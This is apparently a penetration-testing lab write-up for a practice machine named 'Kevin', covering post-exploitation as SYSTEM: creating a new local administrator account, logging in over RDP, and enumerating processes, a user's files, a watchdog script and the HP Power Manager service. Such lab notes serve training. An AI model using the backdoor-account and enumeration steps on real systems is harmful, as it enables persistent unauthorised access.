Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.
C:\Windows\system32> net user adm1n Qwer1234 /ADD
net user adm1n Qwer1234 /ADD
The command completed successfully.
C:\Windows\system32> net localgroup administrators /ADD adm1n
net localgroup administrators /ADD adm1n
The command completed successfully.┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/kevin/MS17-010]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0/Practice/Kevin/3-Exploitation/attachments/{DE838DB9-F95A-4767-B9A7-CA4A1D146A28}.png)
Processes
/Practice/Kevin/3-Exploitation/attachments/{008B7992-0C54-4F98-B3AC-878F89C7F2CA}.png)
C:\Windows\system32> tasklist /svc
tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 260 N/A
csrss.exe 340 N/A
wininit.exe 384 N/A
csrss.exe 392 N/A
winlogon.exe 448 N/A
services.exe 484 N/A
lsass.exe 492 EFS, KeyIso, ProtectedStorage, SamSs
lsm.exe 500 N/A
svchost.exe 604 DcomLaunch, PlugPlay, Power
vmacthlp.exe 664 VMware Physical Disk Helper Service
svchost.exe 696 RpcEptMapper, RpcSs
svchost.exe 748 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
svchost.exe 832 AudioEndpointBuilder, CscService, Netman,
SysMain, TrkWks, UmRdpService, UxSms,
WdiSystemHost
svchost.exe 916 AeLookupSvc, Browser, CertPropSvc, gpsvc,
IKEEXT, iphlpsvc, LanmanServer, ProfSvc,
Schedule, SENS, SessionEnv,
ShellHWDetection, Themes, Winmgmt
svchost.exe 1012 EventSystem, netprofm, nsi, WdiServiceHost
svchost.exe 1116 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, TermService
spoolsv.exe 1212 Spooler
svchost.exe 1248 BFE, DPS, MpsSvc
VGAuthService.exe 1456 VGAuthService
vmtoolsd.exe 1484 VMTools
svchost.exe 1780 PolicyAgent
WmiPrvSE.exe 1872 N/A
taskhost.exe 324 N/A
dwm.exe 1480 N/A
explorer.exe 636 N/A
vmtoolsd.exe 2060 N/A
BETaskMgr.exe 2068 N/A
python.exe 2076 N/A
conhost.exe 2096 N/A
WmiPrvSE.exe 2168 N/A
msdtc.exe 2296 MSDTC
svchost.exe 3104 WinDefend
cmd.exe 820 N/A
conhost.exe 816 N/A
TrustedInstaller.exe 2480 TrustedInstaller
csrss.exe 2180 N/A
winlogon.exe 4076 N/A
LogonUI.exe 908 N/A
csrss.exe 868 N/A
winlogon.exe 3616 N/A
rdpclip.exe 1892 N/A
dwm.exe 3424 N/A
explorer.exe 2780 N/A
taskhost.exe 560 N/A
vmtoolsd.exe 2144 N/A
BETaskMgr.exe 2548 N/A
powershell.exe 2688 N/A
conhost.exe 3328 N/A
taskmgr.exe 1528 N/A
tasklist.exe 140 N/A python.exe
kevin user
C:\Windows\system32> tree /F /A C:\Users\kevin
tree /F /A C:\Users\kevin
Folder PATH listing
Volume serial number is 00000002 A451:A4B1
C:\USERS\KEVIN
| hp.zip
| odbg110.zip
|
+---Contacts
| kevin.contact
|
+---Desktop
| hpservice.py
|
+---Documents
+---Downloads
+---Favorites
| +---Links
| | Suggested Sites.url
| | Web Slice Gallery.url
| |
| +---Links for United States
| | GobiernoUSA.gov.url
| | USA.gov.url
| |
| +---Microsoft Websites
| | IE Add-on site.url
| | IE site on Microsoft.com.url
| | Microsoft At Home.url
| | Microsoft At Work.url
| | Microsoft Store.url
| |
| +---MSN Websites
| | MSN Autos.url
| | MSN Entertainment.url
| | MSN Money.url
| | MSN Sports.url
| | MSN.url
| | MSNBC News.url
| |
| \---Windows Live
| Get Windows Live.url
| Windows Live Gallery.url
| Windows Live Mail.url
| Windows Live Spaces.url
|
+---Links
| Desktop.lnk
| Downloads.lnk
| RecentPlaces.lnk
|
+---Music
+---ollydbg
| BOOKMARK.DLL
| Cmdline.dll
| dbghelp.dll
| DevManBE.bak
| DevManBE.udd
| license.txt
| MSVCP60.bak
| MSVCP60.udd
| OLLYDBG.EXE
| OLLYDBG.HLP
| ollydbg.ini
| readme.txt
| register.txt
|
+---Pictures
+---Saved Games
+---Searches
\---Videoshpservice.py
hpservice.py
C:\Windows\system32> type C:\Users\kevin\Desktop\hpservice.py
type C:\Users\kevin\Desktop\hpservice.py
import wmi, pythoncom, time, os
def startHP():
cmd = 'sc start devmanbe'
os.system(cmd)
return
while True:
hpok = False
pythoncom.CoInitialize()
try:
c = wmi.WMI()
for process in c.Win32_Process():
if process.Name == 'DevManBE.exe':
hpok = True
print "[*] Hp service ok, proc:", process.ProcessId
finally:
pythoncom.CoUninitialize()
if not hpok:
startHP()
time.sleep(60)devmanbe
DevManBE.exe
devmanbe service
C:\Windows\system32> sc qc devmanbe
sc qc devmanbe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: devmanbe
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\HP\Power Manager\DevManBE.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HP Power Manager 4.2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem/Practice/Kevin/3-Exploitation/attachments/{8836A421-3AB1-4250-8CCF-2195B1EA4E7B}.png)